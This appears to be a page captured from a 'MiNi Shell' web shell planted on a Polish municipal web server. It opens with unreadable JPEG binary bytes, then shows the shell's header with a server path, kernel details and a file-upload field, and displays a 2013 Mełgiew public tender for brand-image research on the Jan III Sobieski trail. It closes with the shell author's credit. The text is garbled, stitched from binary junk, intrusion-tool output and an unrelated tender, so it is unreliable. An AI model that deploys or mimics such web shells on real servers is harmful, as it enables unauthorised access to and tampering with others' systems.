JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130214/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130214/23955-N-2013.html

<p class="kh_header"><b>Mełgiew: Opracowanie i przeprowadzenie badań wizerunkowych marki Szlak Jana III Sobieskiego w ramach projektu pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy</b><br>
<b>Numer ogłoszenia: 23955 - 2013; data zamieszczenia: 14.02.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Mełgiew , ul. Partyzancka 2, 21-007 Mełgiew, woj. lubelskie, tel. 081 759 77 01, 02, 03, faks 081 759 77 04.</p>
<ul class="kh_indent_1">
</ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Opracowanie i przeprowadzenie badań wizerunkowych marki Szlak Jana III Sobieskiego w ramach projektu pn. MARKA LOKALNA SZANSĄ ROZWOJU PRZEDSIĘBIORCZOŚCI NA SZLACHECKIM SZLAKU W WOJEWÓDZTWIE LUBELSKIM realizowanego w ramach Szwajcarsko-Polskiego Programu Współpracy.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> I. Zamówienie obejmuje: 1.	Zaplanowanie i przeprowadzenie badania dotyczącego znajomości i wizerunku marki Szlak Jana III Sobieskiego wśród mieszkańców województwa lubelskiego (w tym opracowanie metodyki, dobór próby badawczej, przygotowanie narzędzi badawczych) oraz napisanie raportu końcowego z badań. 2.	Zaplanowanie i przeprowadzenie badania dotyczącego preferencji obecnych i potencjalnych turystów w odniesieniu do oferty produktowej obszaru gmin, w których realizowany jest projekt pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim w ramach Szwajcarsko - Polskiego Programu Współpracy, tj. Gmina Mełgiew, Gmina Rybczewice, Gmina Gorzków, Gmina Piaski, Gmina Spiczyn, Gmina Wólka (w tym opracowanie metodyki, dobór próby badawczej, przygotowanie narzędzi badawczych) oraz napisanie raportu końcowego z badań. 3.	Przygotowanie prezentacji wyników badań wraz z najważniejszymi wnioskami i zaleceniami praktycznymi. II. Najważniejsze cele badania są następujące:
1.	w przypadku badania dotyczącego znajomości i wizerunku marki Szlak Jana III Sobieskiego: stopień znajomości badanej marki, wizerunek marki, powiązanie marki z obszarem geograficznym; 2.	w przypadku badania dotyczącego preferencji obecnych i potencjalnych turystów w odniesieniu do oferty produktowej obszaru gmin, w których realizowany jest projekt pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim w ramach Szwajcarsko - Polskiego Programu Współpracy, tj. Gmina Mełgiew, Gmina Rybczewice, Gmina Gorzków, Gmina Piaski, Gmina Spiczyn, Gmina Wólka : określenie profilu turystów obecnych i potencjalnych zidentyfikowanie ich potrzeb i preferencji w kontekście produktów turystycznych i paraturystycznych oferowanych przez obszar projektowy pod szyldem marki parasolowej (Jan III Sobieski).  III. Metody badawcze:
1.	w przypadku badania dotyczącego znajomości i wizerunku marki Szlak Jana III Sobieskiego: wywiad bezpośredni (face to face) z wykorzystaniem papierowej wersji kwestionariusza (PAPI), wywiad powinien trwać ok. 15-20 minut; 2.	w przypadku badania dotyczącego preferencji obecnych i potencjalnych turystów w odniesieniu do oferty produktowej obszaru gmin, w których realizowany jest projekt pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim w ramach Szwajcarsko - Polskiego Programu Współpracy, tj. Gmina Mełgiew, Gmina Rybczewice, Gmina Gorzków, Gmina Piaski, Gmina Spiczyn, Gmina Wólka : a)	wywiad bezpośredni (face to face) z wykorzystaniem papierowej wersji kwestionariusza (PAPI): wywiad powinien trwać ok. 20-25 minut; b)	zogniskowany wywiad grupowy (FGI): celem fokusów będzie pogłębienie wiedzy zdobytej w trakcie badań ilościowych, poznanie bardziej ukrytych motywów i potrzeb respondentów oraz weryfikacja części hipotez badawczych, wywiad powinien trwać ok. 1,5 godziny. IV. Populacja badana: 1.	w przypadku badania dotyczącego znajomości i wizerunku marki Szlak Jana III Sobieskiego: mieszkańcy województwa lubelskiego; wiek 20+; wykształcenie: średnie, wyższe; status zawodowy: studenci, pracujący, bezrobotni; 2.	w przypadku badania dotyczącego preferencji obecnych i potencjalnych turystów w odniesieniu do oferty produktowej obszaru gmin, w których realizowany jest projekt pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim w ramach Szwajcarsko - Polskiego Programu Współpracy, tj. Gmina Mełgiew, Gmina Rybczewice, Gmina Gorzków, Gmina Piaski, Gmina Spiczyn, Gmina Wólka: mieszkańcy Polski - turyści oraz potencjalni turyści województwa lubelskiego; wiek 20+; wykształcenie: średnie, wyższe; status zawodowy: studenci, pracujący; zainteresowania: turystyka, podróże. V. Metody doboru i liczebność próby: 1.	w przypadku badania dotyczącego znajomości i wizerunku marki Szlak Jana III Sobieskiego: kwotowy dobór próby; kwoty wyodrębnione wg miejsca zamieszkania, płci, wieku, wykształcenia i statusu zawodowego,  liczebność próby: co najmniej 200 osób (co najmniej 25 mieszkańców Gminy Mełgiew, 25 mieszkańców Gminy Rybczewice, 25 mieszkańców Gminy Gorzków, 25 mieszkańców Gminy Piaski, 25 mieszkańców Gminy Spiczyn, 25 mieszkańców Gminy Wólka oraz 50 mieszkańców województwa lubelskiego nie zamieszkujących ww. gmin)  2.	w przypadku badania dotyczącego preferencji obecnych i potencjalnych turystów w odniesieniu do oferty produktowej obszaru gmin, w których realizowany jest projekt pn. Marka lokalna szansą rozwoju przedsiębiorczości na Szlacheckim Szlaku w województwie lubelskim w ramach Szwajcarsko - Polskiego Programu Współpracy, tj. Gmina Mełgiew, Gmina Rybczewice, Gmina Gorzków, Gmina Piaski, Gmina Spiczyn, Gmina Wólka: a)	wywiad bezpośredni (face to face) z wykorzystaniem papierowej wersji kwestionariusza (PAPI): kwotowy dobór próby; kwoty wyodrębnione wg płci, wieku, wykształcenia i statusu zawodowego,  liczebność próby: co najmniej 75 obecnych turystów i co najmniej 75 potencjalnych turystów województwa lubelskiego,
wywiad należy przyprowadzić w 4 miastach wojewódzkich: Warszawa, Rzeszów, Kielce, Lublin, b)	zogniskowany wywiad grupowy (FGI): kwotowy dobór próby; kwoty wyodrębnione wg płci, wieku, wykształcenia i statusu zawodowego, należy przeprowadzić co najmniej 4 wywiady w miastach wojewódzkich - każdy wywiad w innym mieście: Warszawa, Rzeszów, Kielce, Lublin,w każdym z wywiadów powinno wziąć udział od 7 do 10 turystów i potencjalnych turystów województwa lubelskiego. VI. Formy edycyjne dokumentów końcowych: 1.	Wykonawca sporządzi pełne opracowanie, tj.: a)	raport z badań: 	w postaci pisemnej: format A-4, oprawa zbindowana, czcionka Arial 11 pkt, interlinia 1,15 w liczbie 7 egzemplarzy, oraz w wersji elektronicznej na CD lub DVD (format MS Word oraz pdf, ewentualnie dodatkowo MS Excel) w liczbie 7 egzemplarzy opatrzonych etykietami informującymi o ich zawartości, b)	prezentację w formacie MS PowerPoint w wersji elektronicznej na CD lub DVD w liczbie 7 egzemplarzy opatrzonych etykietami informującymi o ich zawartości. 2.	Raport powinien mieć typową strukturę dla tego rodzaju dokumentów, tj.: stronę tytułową, spis treści, wprowadzenie, część metodologiczną, prezentację wyników badań, podsumowanie wyników i rekomendacje, spisy (np. tabel, wykresów), załączniki (np. kwestionariusz wywiadu). 3.	W raporcie należy wykorzystać stosowne metody prezentacji wyników badań (tabele, wykresy, rysunki, ewentualnie zdjęcia, mapy itd.). 4.	Raport i prezentacja powinny otrzymać szatę edycyjną, zgodnie z projektem graficznym dostarczonym przez Zamawiającego. 5.	Wykonawca odpowiada za merytoryczną stronę opracowania, błędy literowe, układ i zawartość; w przypadku stwierdzenia jakichkolwiek błędów w opracowaniu Wykonawca uwzględni uwagi Zamawiającego. VII. Wykonawca zobowiązuje się do przeprowadzenie prezentacji opracowania lub jego części przed określonym przez Zamawiającego gronem. VIII. Przedmiot zamówienia zostanie zrealizowany od dnia podpisania umowy do dnia 31 maja 2013r.</p>
<p><b>II.1.4) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p>

<p><b>II.1.5) Wspólny Słownik Zamówień (CPV):</b> 73.30.00.00-5, 79.31.00.00-0, 79.32.00.00-3, 79.31.50.00-5.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2013.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie żąda wniesienia wadium</p>
<p><b>III.2) ZALICZKI</b></p>
<ul class="kh_indent_1"><li><b>Czy przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b> nie</li></ul>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy wykażą, że  w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzonej działalności jest krótszy, w tym okresie, należycie wykonali co najmniej jedną usługę o wartości minimalnej 50 000 zł brutto, polegającej na przeprowadzeniu badania wizerunkowego</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>za spełniających warunek udziału w postępowaniu zamawiający uzna wykonawców, którzy dysponują lub będą dysponować co najmniej 3 osobowym zespołem badawczym składającym się z kierownika i dwóch członków spełniającym poniższe wymagania:	kierownik - doświadczenie w wykonaniu co najmniej 4 badań wizerunkowych, w tym w co najmniej w 2 jako kierownik zespołu badawczego, członkowie - doświadczenie w wykonaniu co najmniej 2 badań wizerunkowych,</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>zamawiający nie wyznacza szczegółowego warunku w tym zakresie</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<ul class="kh_indent_1"><li>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnieniu warunków udziału w postępowaniu, należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, dostaw lub usług  w zakresie niezbędnym do wykazania spełniania warunku wiedzy i doświadczenia w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, z podaniem ich wartości, przedmiotu, dat wykonania i odbiorców, oraz załączeniem dokumentu potwierdzającego, że te dostawy lub usługi zostały wykonane lub są wykonywane należycie</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych dla wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami</li>

</ul></li>

<li><p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru, jeżeli odrębne przepisy wymagają wpisu do rejestru, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert, a w stosunku do osób fizycznych oświadczenie w zakresie art. 24 ust. 1 pkt 2 ustawy</li>

</ul></li>
<li>
<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert</li>

</ul></li>
</ul>
<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>* Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia: a)	w przypadku wykonawców wspólnie ubiegających się o udzielenie zamówienia, wykonawcy ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, b)	w przypadku złożenia oferty wspólnej każdy z Wykonawców musi oddzielnie udokumentować spełnienie wymagań określonych w art. 22 ust. 1 pkt 1 ustawy Pzp oraz brak podstaw do wykluczenia z niniejszego postępowania o udzielenie zamówienia w okolicznościach określonych  w art. 24 ust. 1 ustawy Pzp; wymagania określone w art. 22 ust. 1 pkt 2, 3 i 4 ustawy Pzp Wykonawcy mogą spełniać wspólnie; Wspólników spółki cywilnej traktuje się jak Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum), dlatego muszą oni spełniać wymagania określone w niniejszym punkcie. * Wykonawca może polegać na wiedzy i doświadczeniu, potencjale technicznym, osobach zdolnych do wykonania zamówienia lub zdolnościach finansowych innych podmiotów, niezależnie od charakteru prawnego łączących go z nim stosunków. Wykonawca w takiej sytuacji zobowiązany jest udowodnić zamawiającemu, iż będzie dysponował zasobami niezbędnymi do realizacji zamówienia, w szczególności przedstawiając w tym celu pisemne zobowiązanie tych podmiotów do oddania mu do dyspozycji niezbędnych zasobów na okres korzystania z nich przy wykonywaniu zamówienia.
Jeżeli Wykonawca,  wykazując spełnienie warunków, o którym mowa w art. 22 ust. 1 ustawy Pzp, polega  na zasobach innych podmiotów na zasadach określonych w art. 26 ust. 2b ustawy Pzp, a podmioty te będą brały udział w realizacji części zamówienia, Zamawiający żąda od Wykonawcy przedstawienia w odniesieniu do tych podmiotów ww. dokumentów wykazujących brak podstaw do wykluczenia  z postępowania o udzielenie zamówienia.</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>nie</p>

<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.melgiew.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Urząd Gminy Mełgiew, ul. Partyzancka 2, 21-007 Mełgiew pok. 313.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.02.2013 godzina 10:30, miejsce: Urząd Gminy Mełgiew, ul. Partyzancka 2, 21-007 Mełgiew pok. 104 (kancelaria Urzędu).</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>




<p><b>IV.4.16) Informacje dodatkowe, w tym dotyczące finansowania projektu/programu ze środków Unii Europejskiej:</b> Projekt Współfinansowany ze środków Szwajcarsko - Polskiego Programu Współpracy.</p>
<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com